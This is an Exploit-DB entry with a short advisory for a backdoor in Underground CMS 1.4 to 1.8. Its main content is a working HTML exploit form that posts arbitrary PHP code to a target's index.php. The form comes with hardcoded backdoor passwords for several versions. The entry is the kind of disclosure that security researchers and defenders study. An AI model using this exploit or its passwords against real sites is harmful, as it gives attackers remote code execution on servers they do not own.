Underground CMS 1.x - 'Search.Cache.Inc.php' Backdoor Access

EDB-ID:

30792

CVE:

N/A


Author:

D4m14n

Type:

webapps


Platform:

PHP

Date:

2007-11-21


<!--
source: https://www.securityfocus.com/bid/26521/info

Underground CMS is prone to a backdoor vulnerability.

Attackers can exploit this issue to gain unauthorized access to the application. Successful attacks will compromise the affected application and possibly the underlying webserver.

Underground CMS 1.4, 1.7, and 1.8 are vulnerable; other versions may also be affected. 
-->

<head> <title>Ucms v. 1.8 Np exploit</title> <script type="text/javascript"> function sethost(seite) { document.host.action = seite + 'index.php?&q=test&e=1'; document.all.data.innerHTML = document.host.action; } </script> </head> <body onLoad="sethost('http://www.example.com/')" > <h1>Ucms v. 1.8 Np exploit</h1> Actual Request:<div id="data"></div> <br /> Host:<input type="text" value="http://www.ucmspage.de/" onKeyUp="sethost(this.value);" /> <form id="host" name="host" action="http://www.ucmspage.de/" method="POST"> Password:<input type="text" name="p" value="ZCShY8FjtEhIF8LZ"><br /> <!-- Additional info: You need a password to activate the backdoor we found these passwords: ZCShY8FjtEhIF8LZ (UCMS 1.8) mYM1NHtWtZk2KwrF (UCMS 1.4) wVCQUyhTga5Nmft1 (UCMS [?]) Just go into the file or similar files to find the passwords, for every version there is another password --> Phpcode:<br /> <textarea name="e" rows="20" cols="100"> phpinfo(); ?> </textarea> <br /> <input type="submit" value="exploit"> </form> </body> <!-- It�s just a crime to do such thigs, so please use this exploit just for knowledge and not to destroy the warez pages... thank you for you attention... Have a nice day --> </html>